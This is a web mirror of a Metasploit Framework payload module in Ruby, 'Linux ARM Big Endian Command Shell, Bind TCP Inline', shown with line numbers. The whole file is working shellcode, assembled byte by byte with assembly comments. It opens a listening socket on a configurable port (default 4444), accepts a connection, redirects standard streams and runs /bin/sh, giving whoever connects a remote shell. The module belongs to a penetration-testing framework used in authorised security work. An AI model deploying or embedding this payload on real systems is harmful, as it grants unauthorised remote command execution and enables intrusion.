CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
Views: 15919
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
7
module MetasploitModule
8
9
CachedSize = 118
10
11
include Msf::Payload::Single
12
include Msf::Sessions::CommandShellOptions
13
14
def initialize(info = {})
15
super(merge_info(info,
16
'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',
17
'Description' => 'Listen for a connection and spawn a command shell',
18
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
19
'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],
20
'License' => MSF_LICENSE,
21
'Platform' => 'linux',
22
'Arch' => ARCH_ARMBE,
23
'Handler' => Msf::Handler::BindTcp,
24
'Session' => Msf::Sessions::CommandShellUnix
25
))
26
# Register command execution options
27
register_options(
28
[
29
OptString.new('CMD', [ true, "The command to execute.", "/bin/sh" ]),
30
Opt::LPORT(4444)
31
])
32
end
33
def generate(_opts = {})
34
cmd = (datastore['CMD'] || '') + "\x00"
35
bytehigh = (datastore['LPORT'].to_i >> 8).chr
36
bytelow = (datastore['LPORT'].to_i & 0xFF).chr
37
38
payload =
39
# turning on thumb mode
40
"\xe2\x8f\x60\x01" + # add r6, pc, #1 #
41
"\xe1\x2f\xff\x16" + # bx r6 #
42
43
# thumb mode on
44
# socket(2,1,0)
45
"\x1a\x92" + # sub r2, r2, r2 #
46
"\x1c\x51" + # add r1, r2, #1 #
47
"\x1c\x90" + # add r0, r2, #2 #
48
"\x02\x0f" + # lsl r7, r1, #8 #
49
"\x37\x19" + # add r7, r7, #0x19 #
50
"\xdf\x01" + # svc 1 #
51
"\x1c\x06" + # mov r6, r0 #
52
53
# bind()
54
"\x22\x02" + # mov r2, #2 #
55
"\x02\x12" + # lsl r2, r2, #8 #
56
"\x32"+bytehigh + # add r2, r2, #0xXX #
57
"\x02\x12" + # lsl r2, r2, #8 #
58
"\x32"+bytelow + # add r2, r2, #0xXX #
59
"\x1a\xdb" + # sub r3, r3, r3 #
60
"\x1b\x24" + # sub r4, r4, r4 #
61
"\x1b\x6d" + # sub r5, r5, r5 #
62
"\x46\x69" + # mov r1, sp #
63
"\xc1\x3c" + # stm r1!, {r2-r5} #
64
"\x39\x10" + # sub r1, #0x10 #
65
"\x22\x10" + # mov r2, #16 #
66
"\x37\x01" + # add r7, r7, #1 #
67
"\xdf\x01" + # svc 1 #
68
69
# listen()
70
"\x1c\x30" + # mov r0, r6 #
71
"\x1a\x49" + # sub r1, r1, r1 #
72
"\x37\x02" + # add r7, r7, #2 #
73
"\xdf\x01" + # svc 1 #
74
75
# accept()
76
"\x1c\x30" + # mov r0, r6 #
77
"\x1a\x92" + # sub r2, r2, r2 #
78
"\x37\x01" + # add r7, r7, #1 #
79
"\xdf\x01" + # svc 1 #
80
"\x1c\x06" + # mov r6, r0 #
81
82
# dup2()
83
"\x1a\x49" + # sub r1, r1, r1 #
84
"\x27\x3f" + # mov r7, #63 #
85
"\xdf\x01" + # svc 1 #
86
"\x1c\x30" + # mov r0, r6 #
87
"\x31\x01" + # add r1, r1, #1 #
88
"\xdf\x01" + # svc 1 #
89
"\x1c\x30" + # mov r0, r6 #
90
"\x31\x01" + # add r1, r1, #1 #
91
"\xdf\x01" + # svc 1 #
92
93
# execve()
94
"\x1a\x92" + # sub r2, r2, r2 #
95
"\x46\x78" + # mov r0, pc #
96
"\x30\x12" + # add r0, #18 #
97
"\x92\x02" + # str r2, [sp, #8] #
98
"\x90\x01" + # str r0, [sp, #4] #
99
"\xa9\x01" + # add r1, sp, #4 #
100
"\x27\x0b" + # mov r7, #11 #
101
"\xdf\x01" + # svc 1 #
102
103
# exit()
104
"\x1b\x24" + # sub r4, r4, r4 #
105
"\x1c\x20" + # mov r0, r4 #
106
"\x27\x01" + # mov r7, #1 #
107
"\xdf\x01" + # svc 1 #
108
cmd
109
end
110
end
111
112